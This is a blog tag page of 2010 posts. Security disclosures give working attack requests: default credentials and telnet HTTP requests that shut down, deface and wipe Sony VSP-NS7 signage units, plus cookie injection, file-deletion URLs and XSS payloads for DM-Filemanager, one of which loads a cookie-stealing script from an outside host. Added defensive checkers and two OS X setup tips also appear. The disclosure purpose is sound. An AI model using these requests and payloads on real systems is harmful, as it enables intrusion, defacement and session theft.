
Posts Tagged ‘Software’

7 Sep 2010

Sony VSP-NS7 Digital Signage Hacking



Recently I tested out a Sony VSP-NS7 digital signage unit for a customer. This machine really impressed me, considering I had used its predecessor, the NSP100, and the newer technology was just what the client needed.

After doing some online searching I found that, other than the manual, there wasn’t much information out there on this unit. Knowing that we were going to place this box on a public network, I decided to run a few tests. I began by firing up Wireshark to sniff traffic to and from this box and was very surprised by what I found.

From this research I was able to determine that there is a web server running on port 4980 by default. Next I was able to retrieve the default username and password of the box by decoding the base64 string below.


    Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
    (decoded) Authorization: Basic NSPXuser:NSPXuser


Since this isn’t published anywhere else I have seen, I would guess that not many users of this system know about it. In fact I would dare say that most installations of this system are still using the default username and password since Sony only mentions that the box can be controlled using their additional VSPA-D7 management software. If it costs big bucks it must be good, right?

Below are some of my findings:


    Default user information
    ————————
    User: NSPXuser
    Pass: NSPXuser
    Port: 4980

    Found commands
    ————————
    http://ip:4980 – Contains software version, unit name, unit and hard drive serial numbers and MAC address.
    http://ip:4980/import/ – Contains all user uploaded content.
    http://ip:4980/command.php – Uses several get variables to control the box.
    http://ip:4980/upload.php – Used in conjunction with get variables to send content to the box.

    http://ip:4980/command.php?cmd=NLOG&comp=cab – Download system logs.
    http://ip:4980/command.php?cmd=SLOG – Displays system logs.
    http://ip:4980/command.php?cmd=SYST – System statistics.
    http://ip:4980/command.php?cmd=DRST – Harddrive statistics.
    http://ip:4980/command.php?cmd=PLCL – Play files.
    http://ip:4980/command.php?cmd=SPCL – Stop playing files.
    http://ip:4980/command.php?cmd=CLST&table=web – List files based on type – web, still, movie and text.
    http://ip:4980/command.php?cmd=LCNF – Load configuration files.
    http://ip:4980/command.php?cmd=RMCL – Remove files.
    http://ip:4980/command.php?cmd=LTBL – Load tables.

    Power off and restart
    ————————
    http://ip:4980/command.php?cmd=RSET&shutdown – Turn the unit off
    http://ip:4980/command.php?cmd=RSET&reboot – Restart unit


Shutdown Sony VSP-NS7

Fire up a telnet session and enter:

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
GET /command.php?cmd=RSET&shutdown HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Cache-Control: no-cache

Without any warning the unit will shut down and have to be restarted from the box or management software if the network allows magic packets.

URL Injection/Defacement Sony VSP-NS7

Fire up a telnet session and enter:

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
PUT /upload.php?href=/import/db/property0.xml&append=0&mkdir=0 HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Content-Length: 601
Cache-Control: no-cache

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<content ver="1.0" date="2010-09-06" time="21:28:43">
	<delete table="WEB_TBL">
		<index>004000003</index>
	</delete>
	<insert table="WEB_TBL">
		<index>004000003</index>
		<cdate>2010-09-06 21:21:55.678</cdate>
		<title>Pwnage</title>
		<size>0</size>
		<deldate>2010-10-06</deldate>
		<link>http://blog.ndarkness.com/?p=577</link>
		<info>Pwned</info>
		<change>01</change>
		<width>0</width>
		<height>0</height>
		<xoffset>0</xoffset>
		<yoffset>0</yoffset>
		<xoption>0</xoption>
		<xreload>0</xreload>
	</insert>
</content>

Next we write the group file.

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
PUT /upload.php?href=/import/group0.xml&append=0&mkdir=0 HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Content-Length: 185
Cache-Control: no-cache

<?xml version="1.0" encoding="UTF-8"?>
<group ver="1.0" date="2010-09-06" time="21:28:43">
	<property date="2010-09-06" time="21:28:43">/import/db/property0.xml</property>
</group>

Now we need to load the file.

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
GET /command.php?cmd=LTBL&file=/import/group0.xml&mode=2 HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Cache-Control: no-cache

Finally, let’s force the unit to call our URL.

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
GET /command.php?cmd=PLCL&id=06&index=004000003 HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Cache-Control: no-cache

Delete Files From Sony VSP-NS7

First we need to obtain a list of images on the unit.
Fire up a telnet session and enter:

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
GET /command.php?cmd=CLST&table=still HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Cache-Control: no-cache

Now we simply select the image we want to delete and enter the following:

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
GET /command.php?cmd=RMCL&table=still&index=002000002 HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Cache-Control: no-cache

The VSPA-D7 management software does allow the default password and port to be changed, but if the traffic is sniffed, the password can easily be decoded again. Not to mention that a similar attack method can be used to change the password of the box and lock the administrator out. Talk about a denial of service!

The only secure solution for this unit is to use a crossover cable and connect directly to the box, or to put it on a network by itself. If you leave it on a public network it is only a matter of time before it falls prey to one of the attacks listed above.
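As an added defensive example (not from the post and not Sony's code), here is a Python checker that inspects captured HTTP requests bound for the signage port and flags the two things shown above: the shipped default credential in the Basic header (or any Basic credential, since it is readable on the wire) and state-changing command.php/upload.php calls. The sample request is constructed from the shutdown request above; the command list and finding names are my own.

```python
import base64
from urllib.parse import parse_qs, urlsplit

# The credential the unit ships with and the command.php verbs from the post that
# change state on the box. Constructed rule set for this checker, not Sony's.
DEFAULT_CREDENTIAL = "NSPXuser:NSPXuser"
STATE_CHANGING_CMDS = {"RSET", "RMCL", "LTBL", "LCNF", "PLCL", "SPCL"}


def basic_header(userpass):
    """Encode 'user:pass' as a Basic Authorization value (used to build samples)."""
    return "Basic " + base64.b64encode(userpass.encode()).decode()


def decode_basic(value):
    """Return the 'user:pass' carried in a Basic Authorization value, else None."""
    scheme, _, token = value.strip().partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        return base64.b64decode(token, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def inspect_request(raw):
    """Flag risky traits in one captured HTTP request (only the head is parsed)."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    request_line, *header_lines = head.split("\n")
    method, target = request_line.split(" ", 2)[:2]
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    findings = []
    cred = decode_basic(headers.get("authorization", ""))
    if cred == DEFAULT_CREDENTIAL:
        findings.append("default-credential")
    elif cred is not None:
        findings.append("cleartext-credential")  # Basic over plain HTTP is readable
    url = urlsplit(target)
    params = parse_qs(url.query, keep_blank_values=True)
    cmd = params.get("cmd", [""])[0].upper()
    if url.path == "/command.php" and cmd in STATE_CHANGING_CMDS:
        findings.append("state-changing-command:" + cmd)
    if url.path == "/upload.php" and method.upper() == "PUT":
        findings.append("content-upload:" + params.get("href", [""])[0])
    return findings


# Constructed capture: the post's shutdown request as it appears on the wire.
SAMPLE_SHUTDOWN = (
    "GET /command.php?cmd=RSET&shutdown HTTP/1.1\r\n"
    "Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=\r\n"
    "User-Agent: VSP-NS7 HTTP Connection\r\n"
    "Host: ip:4980\r\n\r\n"
)
```

Run `inspect_request(SAMPLE_SHUTDOWN)` against a capture of the default-credential shutdown above and it returns both findings; point it at a proxy or IDS log of port 4980 traffic to spot units still on the factory login.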

7 September, 2010 at 1:01 by safety

Tags: Exploit, Hacking, Privacy, Software, Vulnerability
Posted in Computer Security, Privacy, Software | No Comments »

6 Sep 2010

OS X – Apache Web Sharing Starts But You Are Unable Connect


In an effort to save you an afternoon of searching, I thought I would post this to help the OS X users having this issue. The usual causes are no content in the web root, a firewall blocking requests, incorrect permissions and/or httpd.conf syntax errors. The one that is a little tougher to track down is Apache not being able to create its log files. Check the line in httpd.conf that gives the path to Apache’s error log. It should look something like this:

ErrorLog "/private/var/log/apache2/error_log"

Now if the apache2 directory does not exist in /private/var/log/, Apache will fail to start without giving you much of an error message. To correct this, in Terminal type:

sudo mkdir /private/var/log/apache2

Enter your admin password and restart Apache, either in System Preferences=>Sharing=>Web Sharing or in Terminal by typing:

sudo apachectl restart

Once this is done, enter your web address in the web browser and you should see your pages load. Hope this helps!

6 September, 2010 at 16:11 by safety

Tags: Apache, Mac, OS X, Software
Posted in Mac OS X, Software | No Comments »

28 Aug 2010

DM-Filemanager 3.9.6-9 Multiple Vulnerabilities

The nDarkness community has recently been working with the wonderful developers over at DutchMonkey.com to review and point out security flaws in some of their freely available software.

During this review process, there were several issues found and we will be posting them in the coming weeks for educational purposes. It is our hope that this information will be used to help others write more secure code and realize the dangers involved with these mistakes.

The next major issue we found in DM-Filemanager versions 3.9.6 – 3.9.7-9* covers several vulnerabilities. Below is the method used to exploit it and a list of possible exploits. Please be aware that this has since been fixed and the latest version is no longer vulnerable.

I discovered that direct calls to ajax.php, code.php and rich.php are not properly validated. Possible exploits for this vulnerability are file disclosure, loss of data and sensitive information, XSS (via source code editing), session hijacking (via XSS), web site defacement and database manipulation/exposure.

*You must first set the following cookies:

javascript:void(document.cookie="USER=someadminuser"); void(document.cookie="USERID=50");void(document.cookie="GROUP=ADMINISTRATORS"); void(document.cookie="GROUPID=1");

Create a new file (see edit below for an easier method):

    http://localhost/dm-filemanager/ajax.php?newfile=yes&filename=index.php

Download files:

    http://localhost/dm-filemanager/?download=yes&file=settings.php&currdir=/dm-filemanager/

Rename:

    http://localhost/dm-filemanager/ajax.php?file=index.shtml&currdir=/&destination=/&rn=yes&newname=index.html

Copy:

    http://localhost/dm-filemanager/ajax.php?file=config.php&currdir=/&destination=/&cp=yes

Edit: (This one has potential ;-) )

    http://localhost/dm-filemanager/code.php?editfile=yes&file=exploit.php&currdir=/

Delete File:

    http://localhost/dm-filemanager/ajax.php?delete=yes&file=index.php&currdir=/wp/&destination=/wp/

Delete Folders:

    http://localhost/dm-filemanager/ajax.php?currdir=/wp/&rmdir=yes&folder=/wp/wp-admin&dir=wp-admin

All DM-Filemanager users are strongly encouraged to upgrade their software to the latest version.
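As an added example (my own Python model, not DM-Filemanager's PHP), this shows the two defects behind the list above side by side with a hardened form: trusting client-set USER/GROUP cookies for the role, and resolving `currdir`/`file` against the web root so that settings.php itself can be downloaded. The hardened version looks the role up in a server-side session and confines every path to an assumed dedicated content root; the cookie names are from the post, everything else (`SESSIONID`, `UPLOAD_ROOT`, the session table) is constructed.

```python
import posixpath

# Assumed dedicated content root. The post's file disclosure worked because paths
# were resolved relative to the web root, where settings.php itself lives.
UPLOAD_ROOT = "/var/www/uploads"
ACTIONS = ("delete", "rmdir", "rn", "cp", "newfile", "download")
ADMIN_ACTIONS = {"delete", "rmdir", "rn", "cp", "newfile"}


def is_admin_vulnerable(cookies):
    """The pattern the post abuses: the role is read from client-set cookies."""
    return cookies.get("GROUP") == "ADMINISTRATORS" and cookies.get("GROUPID") == "1"


def session_for(cookies, session_store):
    """Hardened: the cookie only names a server-side session; the role lives there."""
    return session_store.get(cookies.get("SESSIONID", ""))


def resolve_path(currdir, name, root=UPLOAD_ROOT):
    """Map user-supplied currdir/name onto a path under root; None if it escapes."""
    if "\x00" in currdir or "\x00" in name:
        return None
    joined = posixpath.join(root, currdir.lstrip("/"), name.lstrip("/"))
    full = posixpath.normpath(joined)
    if full != root and not full.startswith(root.rstrip("/") + "/"):
        return None
    return full


def authorize_action(params, cookies, session_store):
    """Gate the ajax.php-style actions from the post behind real session checks."""
    action = next((a for a in ACTIONS if params.get(a) == "yes"), None)
    if action is None:
        return "denied: unknown action"
    session = session_for(cookies, session_store)
    if session is None:
        return "denied: not logged in"
    if action in ADMIN_ACTIONS and session.get("group") != "ADMINISTRATORS":
        return "denied: not an administrator"
    name = params.get("file") or params.get("dir") or params.get("filename") or ""
    target = resolve_path(params.get("currdir", "/"), name)
    if target is None:
        return "denied: path outside content root"
    return action + " " + target


# Constructed inputs: the cookies the post injects, and a server-side session table.
INJECTED_COOKIES = {"USER": "someadminuser", "USERID": "50",
                    "GROUP": "ADMINISTRATORS", "GROUPID": "1"}
SESSIONS = {"s1": {"user": "alice", "group": "ADMINISTRATORS"},
            "s2": {"user": "bob", "group": "USERS"}}
```

The injected cookies satisfy `is_admin_vulnerable` but get "denied: not logged in" from `authorize_action`, because no server-side session exists for them; rename and copy destinations are not validated here and would need the same `resolve_path` treatment.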

28 August, 2010 at 12:10 by safety

Tags: Cookie Injection, DM-FileManager, Privacy, Software, Vulnerability, XSS
Posted in Computer Security, Privacy, Software, Utilities | No Comments »

19 May 2010

Mac OS X – Update PHP, MySQL and Easily Add GD Support

If you have ever tried compiling the GD library on Mac OS X, you know that there are several issues to overcome before it is usable. Not to mention the version of PHP included with OS X wasn’t compiled with this option. In this post I will detail an easy method to update PHP, install MySQL and the GD library in just a few steps.

To start this process, we need to grab a couple of install packages from the links listed below:

  • MySQL for your version of OS X.
  • Marc Liyanage’s PHP Apache Module.

Once you have these packages downloaded, we can start by installing MySQL. Open the MySQL image and install the package by following the directions. When the install process finishes, copy the MySQL.prefPane to “your_user/Library/PreferencePanes”. Doing this allows you to start and stop the server from the system preferences window. Finally, make sure you take the time to secure your new installation.

If you had previously enabled the PHP module in the httpd.conf file, make sure you comment it back out.

Using the terminal from: Applications=>Utilities=>Terminal.app
(The following commands are entered without quotes.)

  • First type: “vi /etc/apache2/httpd.conf”
  • Find the PHP module:
    LoadModule php5_module libexec/apache2/libphp5.so
  • Type: “i” and change the line to read:
    #LoadModule php5_module libexec/apache2/libphp5.so
  • Now press the “esc” key, type “:wq” and press “enter”

The next step in this process is to install an updated version of PHP with GD support. The great thing about using the Entropy package is that all of the hard work is already done for you! Open the installer and click the customize button if you don’t need all of the included extensions.

Once you have chosen the extensions you need, click install. When the install finishes, the last thing we need to do is edit the php.ini.

Using the terminal from: Applications=>Utilities=>Terminal.app
(The following commands are entered without quotes.)

  • First type: “vi /usr/local/php5/lib/php.ini”
  • Now type: “?mysql” and scroll up until you get to the lines that look like this:
    mysql.default_socket = /tmp/mysql.sock
    mysqli.default_socket = /tmp/mysql.sock
  • Type “i” and change them to:
    mysql.default_socket = /var/mysql/mysql.sock
    mysqli.default_socket = /var/mysql/mysql.sock
  • Finally press the “esc” key, type “:wq” and press “enter”

Now all you have to do is start Web Sharing from the system preferences window and all of your new features will be ready to use.

19 May, 2010 at 21:34 by safety

Tags: Mac, MySQL, OS X, PHP, Software
Posted in Mac OS X, Software, Utilities | No Comments »

30 Jan 2010

DM-FileManager 3.9.9 XSS Vulnerability

The nDarkness community has recently been working with the wonderful developers over at DutchMonkey.com to review and point out security flaws in some of their freely available software.

During this review process, there were several issues found and we will be posting them in the coming weeks for educational purposes. It is our hope that this information will be used to help others write more secure code and realize the dangers involved with these mistakes.

DM-FileManager 3.9.9 and below is vulnerable to XSS via the message variable not being properly sanitized.

This example shows nDarkness.com in an iframe within the login page:

http://localhost/~safety/dm-filemanager/login.php?referrer=/&message=<p align=center><iframe src=http://ndarkness.com width=100% height=800></iframe></p>

Here is a url encoded version:


http://localhost/~safety/dm-filemanager/login.php?referrer=/&message=%3C%70%20%61%6C%69%67%6E%3D%63%65%6E%74%65%72%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%6E%64%61%72%6B%6E%65%73%73%2E%63%6F%6D%20%77%69%64%74%68%3D%31%30%30%25%20%68%65%69%67%68%74%3D%38%30%30%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%70%3E

One step further is the cookie stealer script:

http://localhost/~safety/dm-filemanager/login.php?referrer=/&message=<SCRIPT SRC=http://blog.ndarkness.com/get-cookie.js></SCRIPT>

Here is a url encoded version:


http://localhost/~safety/dm-filemanager/login.php?message=%3C%53%43%52%49%50%54%20%53%52%43%3D%68%74%74%70%3A%2F%2F%62%6C%6F%67%2E%6E%64%61%72%6B%6E%65%73%73%2E%63%6F%6D%2F%67%65%74%2D%63%6F%6F%6B%69%65%2E%6A%73%3E%3C%2F%53%43%52%49%50%54%3E

A common exploit for this would be to make up a bug report and alert the site owner of the situation in the hopes that they were logged in when they clicked the link above. The next step would be to use session hijacking to steal the user’s session.

Another option is to call the delete folder ajax.php command and let the user delete directories off of their site.


http://localhost/~safety/dm-filemanager/login.php?referrer=/&message=http://localhost/~safety/dm-filemanager/ajax.php?currdir=/safety/Sites/wp/&rmdir=yes&folder=/safety/Sites/wp/wp-admin&dir=wp-admin

DM-Filemanager users should not follow untrusted links and should upgrade to the latest version.
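As an added example (my own Python model, not the project's PHP), this puts the reflected `message` handling the post describes next to a hardened version: the parameter is treated as a key into server-side wording, and anything that is not a known key is HTML-escaped before it reaches the page. The allow-list keys and the sample URL (pointing at a placeholder host) are constructed.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Assumed allow-list: login.php receives a message key, never free text, and maps
# it to server-side wording. Anything else is escaped so it renders as inert text.
ALLOWED_MESSAGES = {
    "badlogin": "Invalid username or password.",
    "loggedout": "You have been logged out.",
}


def message_from_url(url):
    """Pull the message parameter out of a login.php URL (percent-decoding it)."""
    return parse_qs(urlsplit(url).query).get("message", [""])[0]


def render_vulnerable(message):
    """Reflects the parameter verbatim: the behaviour the post describes."""
    return '<p class="message">' + message + "</p>"


def render_hardened(message):
    """Known key -> fixed text; otherwise HTML-escape before reflecting."""
    text = ALLOWED_MESSAGES.get(message)
    if text is None:
        text = html.escape(message, quote=True)
    return '<p class="message">' + text + "</p>"


# Constructed sample modelled on the post's payload, aimed at a placeholder host.
SAMPLE_URL = ("http://localhost/dm-filemanager/login.php?referrer=/"
              "&message=%3Cscript%20src%3Dhttp%3A%2F%2Fattacker.example%2Fx.js%3E%3C%2Fscript%3E")
```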

30 January, 2010 at 22:03 by safety

Tags: DM-FileManager, Exploit, Hacking, Software, Vulnerability, XSS
Posted in Computer Security | No Comments »
